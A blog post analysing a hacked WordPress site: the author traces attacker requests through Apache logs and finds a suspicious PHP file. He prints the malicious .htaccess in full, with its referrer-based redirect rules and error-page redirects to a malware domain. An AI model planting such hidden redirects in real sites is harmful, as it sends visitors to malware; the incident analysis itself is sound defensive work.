Pierre-Luc Brunet's Blog

Security analyst, Developer, Server administrator, Goalie, Father

Analysis of a Hacked Wordpress Blog

| Comments

I received one of those fun abuse emails this evening regarding the Wordpress site ZeStuff hosts for one of my friend. Turns out his site has been hacked into is now being abused by criminals to infect computers with the ZeuS banking Trojan (fun times). I quickly SSH’ed into the machine to shut down the site until I had more time later that evening to figure out what happened. Now that the kids are asleep, let’s see how they got in.

First thing I’m interested to know is where this started and, hopefully, who did it. Provided you keep enough access log files around, it’s a pretty easy task.

1

$ grep -iP "traninfo\.html" vhosts_access.log vhosts_access.log

Using this command, I was able to determine that the first request to that page was today at 9:01:37 (EDT) by 50.116.26.166. Great. Now let’s make sure that’s really our hacker.

1
2
3
4
5
6
7
8

$ grep -iP '50\.116\.26\.166' vhosts_access.log

50.116.26.166 - [24/Jul/2012:09:01:36 -0400] "GET /wp-xml.php HTTP/1.1" 200 341 37555 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
50.116.26.166 - [24/Jul/2012:09:01:36 -0400] "POST /wp-xml.php HTTP/1.0" 200 5094 38155 "-" "-"
50.116.26.166 - [24/Jul/2012:09:01:37 -0400] "GET /traninfo.html HTTP/1.1" 200 344 4190 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
50.116.26.166 - [24/Jul/2012:09:04:29 -0400] "GET /wp-xml.php HTTP/1.1" 200 341 38210 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
50.116.26.166 - [24/Jul/2012:09:04:30 -0400] "POST /wp-xml.php HTTP/1.0" 200 5094 38155 "-" "-"
50.116.26.166 - [24/Jul/2012:09:04:30 -0400] "GET /traninfo.html HTTP/1.1" 200 344 4190 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"

Yep. That’s odd enough for me. Let’s see what’s in /traninfo.html anyway.

1
2

$ cat traninfo.html
cat: traninfo.html: No such file or directory

Awesome. Let’s see if anything was changed.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

$ ls -l
total 4148
-rw-r--r-- 1 2017 2017     130 2009-12-26 00:00 400.shtml
-rw-r--r-- 1 2017 2017     162 2009-12-26 00:00 401.shtml
-rw-r--r-- 1 2017 2017     201 2009-12-26 00:00 403.shtml
-rw-r--r-- 1 2017 2017     175 2009-12-26 00:00 404.shtml
-rw-r--r-- 1 2017 2017     442 2009-12-26 00:00 500.php
-rw-r--r-- 1 2017 2017      71 2009-12-26 00:00 500.shtml
-rw-r--r-- 1 2017 2017       0 2009-12-26 00:00 default.html
drwxr-xr-x 2 2017 2017    4096 2010-12-14 01:36 files
-rw-r--r-- 1 2017 2017    2661 2012-07-24 15:17 .htaccess
-rw-r--r-- 1 2017 2017     397 2011-02-10 18:16 index.php
-rw-r--r-- 1 2017 2017   15410 2011-02-10 18:16 license.txt
-rw-r--r-- 1 2017 2017    9210 2011-02-10 18:16 readme.html
-rw-r--r-- 1 2017 2017    4391 2011-02-10 18:16 wp-activate.php
drwxr-xr-x 7 2017 2017    4096 2012-07-24 15:07 wp-admin
-rw-r--r-- 1 2017 2017   40284 2011-02-10 18:16 wp-app.php
-rw-r--r-- 1 2017 2017     220 2011-02-10 18:16 wp-atom.php
-rw-r--r-- 1 2017 2017     274 2011-02-10 18:16 wp-blog-header.php
-rw-r--r-- 1 2017 2017   23305 2012-07-16 10:21 wp_c182.php
-rw-r--r-- 1 2017 2017    3926 2011-02-10 18:16 wp-comments-post.php
-rw-r--r-- 1 2017 2017     238 2011-02-10 18:16 wp-commentsrss2.php
-rw-r--r-- 1 2017 2017    2537 2011-05-23 12:20 wp-config.php
-rw-r--r-- 1 2017 2017    3173 2011-02-10 18:16 wp-config-sample.php
drwxr-xr-x 6 2017 2017    4096 2012-07-24 15:04 wp-content
-rw-r--r-- 1 2017 2017     240 2011-02-10 18:16 wp-feed.php
drwxr-xr-x 7 2017 2017    4096 2011-02-10 18:21 wp-includes
-rw-r--r-- 1 2017 2017    2002 2011-02-10 18:16 wp-links-opml.php
-rw-r--r-- 1 2017 2017    2441 2011-02-10 18:16 wp-load.php
-rw-r--r-- 1 2017 2017   26059 2011-02-10 18:16 wp-login.php
-rw-r--r-- 1 2017 2017    7774 2011-02-10 18:16 wp-mail.php
-rw-r--r-- 1 2017 2017     487 2011-02-10 18:16 wp-pass.php
-rw-r--r-- 1 2017 2017     218 2011-02-10 18:16 wp-rdf.php
-rw-r--r-- 1 2017 2017     316 2011-02-10 18:16 wp-register.php
-rw-r--r-- 1 2017 2017     220 2011-02-10 18:16 wp-rss2.php
-rw-r--r-- 1 2017 2017     218 2011-02-10 18:16 wp-rss.php
-rw-r--r-- 1 2017 2017    9177 2011-02-10 18:16 wp-settings.php
-rw-r--r-- 1 2017 2017   18695 2011-02-10 18:16 wp-signup.php
-rw-r--r-- 1 2017 2017    3702 2011-02-10 18:16 wp-trackback.php
-rw-r--r-- 1 2017 2017   95481 2011-02-10 18:16 xmlrpc.php

Why. Isn’t that interesting. .htaccess was modified today.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

$ cat .htaccess 

<I removed 370 blank lines with no content>
RewriteBase /
RewriteEngine on
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*gmail.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*[OR]
RewriteCond %{HTTP_REFERER} .*hotmail.*
RewriteRule ^(.*)$ http://ear*removed*ons.com/ [R=301,L]


ErrorDocument 400 http://ear*removed*ons.com/
ErrorDocument 401 http://ear*removed*ons.com/
ErrorDocument 403 http://ear*removed*ons.com/
ErrorDocument 404 http://ear*removed*ons.com/
ErrorDocument 500 http://ear*removed*ons.com/

So that explains why a lot of the pages were returning 302 in the logs but there’s a few hours of 200 response (meaning the html page was there at some point). This probably means that once Spamhaus detected the hack, the hackers removed the page and left just the forwarder hidden in the .htaccess file.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

$ grep -iP 'wp-xml\.php' vhosts_access.log
212.71.10.193 - [24/Jul/2012:08:45:28 -0400] "POST /wp-xml.php HTTP/1.0" 200 2680 375 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:08:45:28 -0400] "POST /wp-xml.php HTTP/1.0" 500 4226 267 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
50.116.26.166 - [24/Jul/2012:09:01:36 -0400] "GET /wp-xml.php HTTP/1.1" 200 341 37555 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
50.116.26.166 - [24/Jul/2012:09:01:36 -0400] "POST /wp-xml.php HTTP/1.0" 200 5094 38155 "-" "-"
50.116.26.166 - [24/Jul/2012:09:04:29 -0400] "GET /wp-xml.php HTTP/1.1" 200 341 38210 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
50.116.26.166 - [24/Jul/2012:09:04:30 -0400] "POST /wp-xml.php HTTP/1.0" 200 5094 38155 "-" "-"
212.71.10.193 - [24/Jul/2012:09:47:15 -0400] "POST /wp-xml.php HTTP/1.0" 200 2680 375 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:09:47:15 -0400] "POST /wp-xml.php HTTP/1.0" 500 4226 267 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
80.255.227.87 - [24/Jul/2012:10:06:42 -0400] "GET /wp-xml.php HTTP/1.1" 200 499 38210 "http://hackedsite.com" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
80.255.227.87 - [24/Jul/2012:10:06:42 -0400] "POST /wp-xml.php HTTP/1.0" 200 1607 38155 "http://hackedsite.com/wp-xml.php" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
80.255.227.87 - [24/Jul/2012:10:06:43 -0400] "POST /wp-xml.php HTTP/1.0" 200 676 38145 "http://hackedsite.com/wp-xml.php" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
80.255.227.87 - [24/Jul/2012:10:13:54 -0400] "GET /wp-xml.php HTTP/1.1" 200 530 38210 "http://hackedsite.com" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
80.255.227.87 - [24/Jul/2012:10:13:54 -0400] "POST /wp-xml.php HTTP/1.0" 200 710 38145 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
80.255.227.87 - [24/Jul/2012:10:13:55 -0400] "POST /wp-xml.php HTTP/1.0" 200 12504 13621 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
80.255.227.87 - [24/Jul/2012:10:13:55 -0400] "POST /wp-xml.php HTTP/1.0" 200 720 13611 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
80.255.227.87 - [24/Jul/2012:10:13:55 -0400] "POST /wp-xml.php HTTP/1.0" 200 1649 13621 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
80.255.227.87 - [24/Jul/2012:10:13:56 -0400] "POST /wp-xml.php HTTP/1.0" 200 720 13611 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
212.71.10.193 - [24/Jul/2012:10:45:08 -0400] "POST /wp-xml.php HTTP/1.0" 200 2680 375 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:10:45:08 -0400] "POST /wp-xml.php HTTP/1.0" 500 4226 267 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:11:47:20 -0400] "POST /wp-xml.php HTTP/1.0" 200 2680 375 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:11:47:20 -0400] "POST /wp-xml.php HTTP/1.0" 500 4226 267 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:12:45:31 -0400] "POST /wp-xml.php HTTP/1.0" 200 2680 375 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:12:45:31 -0400] "POST /wp-xml.php HTTP/1.0" 500 4226 267 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:13:45:48 -0400] "POST /wp-xml.php HTTP/1.0" 200 2680 375 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:13:45:48 -0400] "POST /wp-xml.php HTTP/1.0" 500 4226 267 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
80.255.227.87 - [24/Jul/2012:14:17:50 -0400] "GET /wp-xml.php HTTP/1.1" 200 529 38210 "http://hackedsite.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9) Gecko/2008052906 Firefox/3.0"
80.255.227.87 - [24/Jul/2012:14:17:50 -0400] "POST /wp-xml.php HTTP/1.0" 200 1247 8571 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9) Gecko/2008052906 Firefox/3.0"
80.255.227.87 - [24/Jul/2012:14:43:06 -0400] "GET /wp-xml.php HTTP/1.1" 200 530 33706 "http://hackedsite.com" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
80.255.227.87 - [24/Jul/2012:14:43:07 -0400] "POST /wp-xml.php HTTP/1.0" 200 737 6557 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
80.255.227.87 - [24/Jul/2012:14:44:52 -0400] "POST /wp-xml.php HTTP/1.0" 302 744 507 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux x86_64; en; rv:1.9.0.2) Gecko/2008092702 Gentoo Firefox/3.0.2"
80.255.227.87 - [24/Jul/2012:14:45:01 -0400] "POST /wp-xml.php HTTP/1.0" 302 747 507 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9a1) Gecko/20061204 GranParadiso/3.0a1"
80.255.227.87 - [24/Jul/2012:14:45:04 -0400] "POST /wp-xml.php HTTP/1.0" 302 761 507 "http://hackedsite.com/wp-xml.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; Arcor 5.005; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
80.255.227.87 - [24/Jul/2012:14:45:09 -0400] "GET /wp-xml.php HTTP/1.1" 302 499 507 "http://hackedsite.com" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
212.71.10.193 - [24/Jul/2012:14:47:26 -0400] "POST /wp-xml.php HTTP/1.0" 302 2680 507 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
80.255.227.87 - [24/Jul/2012:14:51:27 -0400] "GET /wp-xml.php HTTP/1.1" 302 483 507 "http://hackedsite.com" "Opera/9.01 (X11; Linux i686; U; en)"
212.71.10.193 - [24/Jul/2012:15:44:21 -0400] "POST /wp-xml.php HTTP/1.0" 302 2680 425 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:16:36:04 -0400] "POST /wp-xml.php HTTP/1.0" 302 2680 425 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:17:25:44 -0400] "POST /wp-xml.php HTTP/1.0" 302 2680 425 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:18:13:25 -0400] "POST /wp-xml.php HTTP/1.0" 403 2680 399 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:19:03:35 -0400] "POST /wp-xml.php HTTP/1.0" 403 2680 399 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:19:54:44 -0400] "POST /wp-xml.php HTTP/1.0" 403 2680 399 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:20:44:11 -0400] "POST /wp-xml.php HTTP/1.0" 403 2680 399 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:21:34:33 -0400] "POST /wp-xml.php HTTP/1.0" 403 2680 399 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:22:25:16 -0400] "POST /wp-xml.php HTTP/1.0" 403 2680 399 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"

Lots of calls but nothing close to 15:17. Let’s see all the pages those IPs loaded.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82

$ grep -iP '(212\.71\.10\.193|50\.116\.26\.166|212\.71\.10\.193|80\.255\.227\.87)' /var/log/apache2/vhosts_access.log
212.71.10.193 - [24/Jul/2012:08:45:28 -0400] "POST /wp-xml.php HTTP/1.0" 200 2680 375 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:08:45:28 -0400] "POST /wp-xml.php HTTP/1.0" 500 4226 267 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
50.116.26.166 - [24/Jul/2012:09:01:36 -0400] "GET /wp-xml.php HTTP/1.1" 200 341 37555 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
50.116.26.166 - [24/Jul/2012:09:01:36 -0400] "POST /wp-xml.php HTTP/1.0" 200 5094 38155 "-" "-"
50.116.26.166 - [24/Jul/2012:09:01:37 -0400] "GET /traninfo.html HTTP/1.1" 200 344 4190 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
50.116.26.166 - [24/Jul/2012:09:04:29 -0400] "GET /wp-xml.php HTTP/1.1" 200 341 38210 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
50.116.26.166 - [24/Jul/2012:09:04:30 -0400] "POST /wp-xml.php HTTP/1.0" 200 5094 38155 "-" "-"
50.116.26.166 - [24/Jul/2012:09:04:30 -0400] "GET /traninfo.html HTTP/1.1" 200 344 4190 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
212.71.10.193 - [24/Jul/2012:09:47:15 -0400] "POST /wp-xml.php HTTP/1.0" 200 2680 375 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:09:47:15 -0400] "POST /wp-xml.php HTTP/1.0" 500 4226 267 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
80.255.227.87 - [24/Jul/2012:10:06:42 -0400] "GET /wp-xml.php HTTP/1.1" 200 499 38210 "http://hackedsite.com" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
80.255.227.87 - [24/Jul/2012:10:06:42 -0400] "POST /wp-xml.php HTTP/1.0" 200 1607 38155 "http://hackedsite.com/wp-xml.php" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
80.255.227.87 - [24/Jul/2012:10:06:43 -0400] "POST /wp-xml.php HTTP/1.0" 200 676 38145 "http://hackedsite.com/wp-xml.php" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
80.255.227.87 - [24/Jul/2012:10:13:54 -0400] "GET /wp-xml.php HTTP/1.1" 200 530 38210 "http://hackedsite.com" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
80.255.227.87 - [24/Jul/2012:10:13:54 -0400] "POST /wp-xml.php HTTP/1.0" 200 710 38145 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
80.255.227.87 - [24/Jul/2012:10:13:55 -0400] "POST /wp-xml.php HTTP/1.0" 200 12504 13621 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
80.255.227.87 - [24/Jul/2012:10:13:55 -0400] "POST /wp-xml.php HTTP/1.0" 200 720 13611 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
80.255.227.87 - [24/Jul/2012:10:13:55 -0400] "POST /wp-xml.php HTTP/1.0" 200 1649 13621 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
80.255.227.87 - [24/Jul/2012:10:13:56 -0400] "POST /wp-xml.php HTTP/1.0" 200 720 13611 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
212.71.10.193 - [24/Jul/2012:10:45:08 -0400] "POST /wp-xml.php HTTP/1.0" 200 2680 375 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:10:45:08 -0400] "POST /wp-xml.php HTTP/1.0" 500 4226 267 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:11:47:20 -0400] "POST /wp-xml.php HTTP/1.0" 200 2680 375 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:11:47:20 -0400] "POST /wp-xml.php HTTP/1.0" 500 4226 267 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:12:45:31 -0400] "POST /wp-xml.php HTTP/1.0" 200 2680 375 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:12:45:31 -0400] "POST /wp-xml.php HTTP/1.0" 500 4226 267 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:13:45:48 -0400] "POST /wp-xml.php HTTP/1.0" 200 2680 375 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:13:45:48 -0400] "POST /wp-xml.php HTTP/1.0" 500 4226 267 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
80.255.227.87 - [24/Jul/2012:14:17:50 -0400] "GET /wp-xml.php HTTP/1.1" 200 529 38210 "http://hackedsite.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9) Gecko/2008052906 Firefox/3.0"
80.255.227.87 - [24/Jul/2012:14:17:50 -0400] "POST /wp-xml.php HTTP/1.0" 200 1247 8571 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9) Gecko/2008052906 Firefox/3.0"
80.255.227.87 - [24/Jul/2012:14:43:06 -0400] "GET /wp-xml.php HTTP/1.1" 200 530 33706 "http://hackedsite.com" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
80.255.227.87 - [24/Jul/2012:14:43:07 -0400] "POST /wp-xml.php HTTP/1.0" 200 737 6557 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
80.255.227.87 - [24/Jul/2012:14:44:52 -0400] "POST /wp-xml.php HTTP/1.0" 302 744 507 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux x86_64; en; rv:1.9.0.2) Gecko/2008092702 Gentoo Firefox/3.0.2"
80.255.227.87 - [24/Jul/2012:14:45:01 -0400] "POST /wp-xml.php HTTP/1.0" 302 747 507 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9a1) Gecko/20061204 GranParadiso/3.0a1"
80.255.227.87 - [24/Jul/2012:14:45:04 -0400] "POST /wp-xml.php HTTP/1.0" 302 761 507 "http://hackedsite.com/wp-xml.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; Arcor 5.005; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
80.255.227.87 - [24/Jul/2012:14:45:09 -0400] "GET /wp-xml.php HTTP/1.1" 302 499 507 "http://hackedsite.com" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
212.71.10.193 - [24/Jul/2012:14:47:26 -0400] "POST /wp-xml.php HTTP/1.0" 302 2680 507 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
80.255.227.87 - [24/Jul/2012:14:51:27 -0400] "GET /wp-xml.php HTTP/1.1" 302 483 507 "http://hackedsite.com" "Opera/9.01 (X11; Linux i686; U; en)"
80.255.227.87 - [24/Jul/2012:14:57:24 -0400] "GET /wp_c182.php HTTP/1.1" 200 483 33715 "http://hackedsite.com" "Opera/9.50 (Windows NT 5.1; U; en)"
80.255.227.87 - [24/Jul/2012:14:57:25 -0400] "POST /wp_c182.php HTTP/1.0" 200 4010 34283 "http://hackedsite.com/wp_c182.php" "Opera/9.50 (Windows NT 5.1; U; en)"
80.255.227.87 - [24/Jul/2012:14:57:25 -0400] "POST /wp_c182.php HTTP/1.0" 200 661 34273 "http://hackedsite.com/wp_c182.php" "Opera/9.50 (Windows NT 5.1; U; en)"
80.255.227.87 - [24/Jul/2012:15:04:35 -0400] "GET /wp_c182.php HTTP/1.1" 200 538 34338 "http://hackedsite.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
80.255.227.87 - [24/Jul/2012:15:04:35 -0400] "POST /wp_c182.php HTTP/1.0" 200 719 34273 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
80.255.227.87 - [24/Jul/2012:15:04:36 -0400] "POST /wp_c182.php HTTP/1.0" 200 1559 14260 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
80.255.227.87 - [24/Jul/2012:15:04:36 -0400] "POST /wp_c182.php HTTP/1.0" 200 754 12460 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
